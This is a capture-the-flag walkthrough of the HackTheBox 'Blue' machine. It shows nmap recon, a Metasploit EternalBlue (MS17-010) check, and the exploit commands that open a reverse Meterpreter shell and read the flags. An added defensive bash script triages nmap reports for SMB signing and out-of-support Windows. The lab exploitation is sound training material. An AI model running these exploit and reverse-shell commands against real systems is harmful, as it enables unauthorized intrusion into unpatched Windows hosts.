HackTheBox Walkthrough - Blue
Target machine: Blue.
Directory: /home/kali/Blue
Time spent on it: 20 mins
Template changelog
Version 1.0 - Sep. 2022: created the base template
Version 1.1 - Oct. 2022: added the nmap scans and the basic commands
Version 1.2 - Nov. 2022: added redirections to avoid error output, and the domain to be compliant with TryHackMe
Version 1.3 - Nov. 2022: added the UDP scan and the export to searchsploit
Phase 1: Reconnaissance
OK, given the name Blue and that it is rated easy, I'm betting on EternalBlue.
┌──(kali㉿kali)-[~]
└─$
name="Blue"
repository="/home/kali/$name"
ip="10.10.10.40"
domain='htb'
# enter the working directory, creating it first if needed (grouped so the mkdir only runs when cd fails)
cd "$repository" 2>/dev/null || { mkdir -p "$repository" && cd "$repository"; }
grep "$ip $name ${name}.${domain}" /etc/hosts >/dev/null || echo "$ip $name ${name}.${domain}" | sudo tee -a /etc/hosts
nmap -Pn -A -T5 --top-ports 1000 -oN $repository/txt $ip
nmap -Pn -A -T5 -p - -oN $repository/full -oX $repository/sploitable $ip
searchsploit --nmap $repository/sploitable
sudo nmap -Pn -A -T5 -sU -p - -oN $repository/udp -oX $repository/udploitable $ip
searchsploit --nmap $repository/udploitable
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.61 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 17:35 CET
Warning: 10.10.10.40 giving up on port because retransmission cap hit (2).
Nmap scan report for Blue (10.10.10.40)
Host is up (0.017s latency).
Not shown: 65467 closed tcp ports (conn-refused), 59 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-12-04T16:37:11
|_ start_date: 2022-12-04T03:06:10
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-12-04T16:37:12+00:00
|_clock-skew: mean: 5s, deviation: 2s, median: 4s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.32 seconds
[i] SearchSploit's XML mode (without verbose enabled). To enable: searchsploit -v --xml...
[i] Reading: '/home/kali/Blue/sploitable'
[i] /usr/bin/searchsploit -t msrpc
[i] /usr/bin/searchsploit -t microsoft windows rpc
------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011) | windows/remote/293.c
Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026) | windows/remote/100.c
Microsoft Windows - 'RPC DCOM' Remote (1) | windows/remote/69.c
Microsoft Windows - 'RPC DCOM' Remote (2) | windows/remote/70.c
Microsoft Windows - 'RPC DCOM' Remote (Universal) | windows/remote/76.c
Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow | windows/remote/64.c
Microsoft Windows - 'RPC DCOM' Scanner (MS03-039) | windows/remote/97.c
Microsoft Windows - 'RPC DCOM2' Remote (MS03-039) | windows/remote/103.c
Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption | windows/dos/3453.py
Microsoft Windows - DCOM RPC Interface Buffer Overrun | windows/remote/22917.txt
Microsoft Windows - DNS RPC Remote Buffer Overflow (2) | windows/remote/3746.txt
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit) | windows/local/45562.rb
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit) | windows/local/45562.rb
Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation | windows/local/47135.txt
Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow | windows/remote/5.c
Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076) | windows/local/37768.txt
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1) | windows/remote/4745.cpp
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2) | windows/remote/4934.c
Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service | windows/dos/61.c
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow | windows/remote/3737.py
Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026) | windows/remote/66.c
Microsoft Windows XP/2000 - RPC Remote Non Exec Memory | windows/remote/117.c
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation | windows/local/32892.txt
------------------------------------------------------------------------------------------------ ---------------------------------
[i] /usr/bin/searchsploit -t netbios ssn
[i] /usr/bin/searchsploit -t microsoft windows netbios ssn
[i] /usr/bin/searchsploit -t microsoft ds
Phase 2: Analysis
OK, so this looks promising: we have NetBIOS, RPC... everything needed for a nice easy EternalBlue. Let's verify.
┌──(kali㉿kali)-[~/Blue]
└─$ msfconsole -qx "use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $ip ; run;exit"
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
That means we will be able to run it without any problem.
Phase 3: User
┌──(kali㉿kali)-[~/Blue]
└─$ localip=`ip a | grep tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
┌──(kali㉿kali)-[~/Blue]
└─$ msfconsole -qx "use exploit/windows/smb/ms17_010_psexec; set RHOSTS $ip; set LHOST $localip;run"
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[*] 10.10.10.40:445 - Built a write-what-where primitive...
[+] 10.10.10.40:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.40:445 - Selecting PowerShell target
[*] 10.10.10.40:445 - Executing the payload...
[+] 10.10.10.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 10.10.10.40
[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.40:49159) at 2022-12-04 17:47:36 +0100
meterpreter > cd /Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2017-07-21 08:56:36 +0200 Administrator
040777/rwxrwxrwx 0 dir 2009-07-14 07:08:56 +0200 All Users
040555/r-xr-xr-x 8192 dir 2009-07-14 09:07:31 +0200 Default
040777/rwxrwxrwx 0 dir 2009-07-14 07:08:56 +0200 Default User
040555/r-xr-xr-x 4096 dir 2011-04-12 09:51:29 +0200 Public
100666/rw-rw-rw- 174 fil 2009-07-14 06:54:24 +0200 desktop.ini
040777/rwxrwxrwx 8192 dir 2017-07-14 15:45:53 +0200 haris
meterpreter > cat haris/Desktop/user.txt
85b6df7ad435ca29ff83d1e2fe51d2d8
meterpreter > cat Administrator/Desktop/root.txt
d6e84d5744a16119df8bd19e5d8e77ed
Phase 4: Privilege escalation
There will be no PE here.
Recap
From the machine name alone we already know what to do, so it's simple. But it is still worth looking at the prerequisites for EternalBlue.
We are on an "old" machine here that exposes SMB and does not require message signing.
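As an added example (not part of the original write-up or of any tool it uses), the bash script below triages an nmap -oN report for exactly the two conditions this recap names: an out-of-support Windows build behind 445/tcp and SMB message signing that is not required. The function names and the sample report are constructed for this example; the report mimics the smb-security-mode, smb2-security-mode and smb-os-discovery fields nmap prints, and the same functions can be pointed at any real -oN file.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: triage an nmap -oN report for the
# two EternalBlue prerequisites the recap points out (end-of-life Windows on 445/tcp,
# SMB message signing not required). All function names here are this example's own.

# Constructed sample report in nmap's normal-output format (not real scan data).
sample_report() {
cat <<'EOF'
Nmap scan report for example-host (192.0.2.10)
PORT      STATE SERVICE      VERSION
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
EOF
}

# smb_port_open FILE -> "yes" if 445/tcp is reported open, else "no"
smb_port_open() {
  grep -q '^445/tcp *open' "$1" && echo yes || echo no
}

# smb_signing FILE -> "required", "not-required" or "unknown"
# SMB1 prints "message_signing: required|supported|disabled"; SMB2 prints a sentence.
smb_signing() {
  awk '
    /^[|]_? *message_signing:/ {
      v = ($0 ~ /message_signing: *required/) ? "required" : "not-required"
    }
    /Message signing enabled and required/     { v = "required" }
    /Message signing enabled but not required/ { v = "not-required" }
    /Message signing disabled/                 { v = "not-required" }
    END { print (v == "" ? "unknown" : v) }
  ' "$1"
}

# smb_os_eol FILE -> "yes" when smb-os-discovery names a Windows release that is
# out of support (XP, Vista, 7, Server 2003/2008), "no" otherwise
smb_os_eol() {
  grep '^| *OS:' "$1" | head -n1 \
    | grep -Eq 'Windows (XP|Vista|7|Server 2003|Server 2008)' && echo yes || echo no
}

# smb_triage FILE -> one verdict line; HIGH only when all three conditions hold
smb_triage() {
  local f=$1
  if [ "$(smb_port_open "$f")" = yes ] && [ "$(smb_signing "$f")" = not-required ] \
     && [ "$(smb_os_eol "$f")" = yes ]; then
    echo "HIGH: legacy Windows exposing SMB without required signing (verify MS17-010 patch level, enforce signing)"
  elif [ "$(smb_port_open "$f")" = yes ] && [ "$(smb_signing "$f")" = not-required ]; then
    echo "MEDIUM: SMB signing not required (enforce signing)"
  else
    echo "LOW: no SMB signing weakness found in report"
  fi
}

# Stand-alone run against the constructed report (prints the HIGH verdict)
main() {
  local tmp
  tmp=$(mktemp)
  sample_report > "$tmp"
  smb_triage "$tmp"
  rm -f "$tmp"
}
main
```

Run it as `bash triage.sh`, or source the file and call `smb_triage /home/kali/Blue/full` against a real report. On the host side the two findings map to two fixes: the MS17-010 update (or retiring the Windows 7 build), and the "Microsoft network server: Digitally sign communications (always)" policy, which sets RequireSecuritySignature on the server so signing moves from "enabled but not required" to required.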
Takeaway
EternalBlue is just brutal.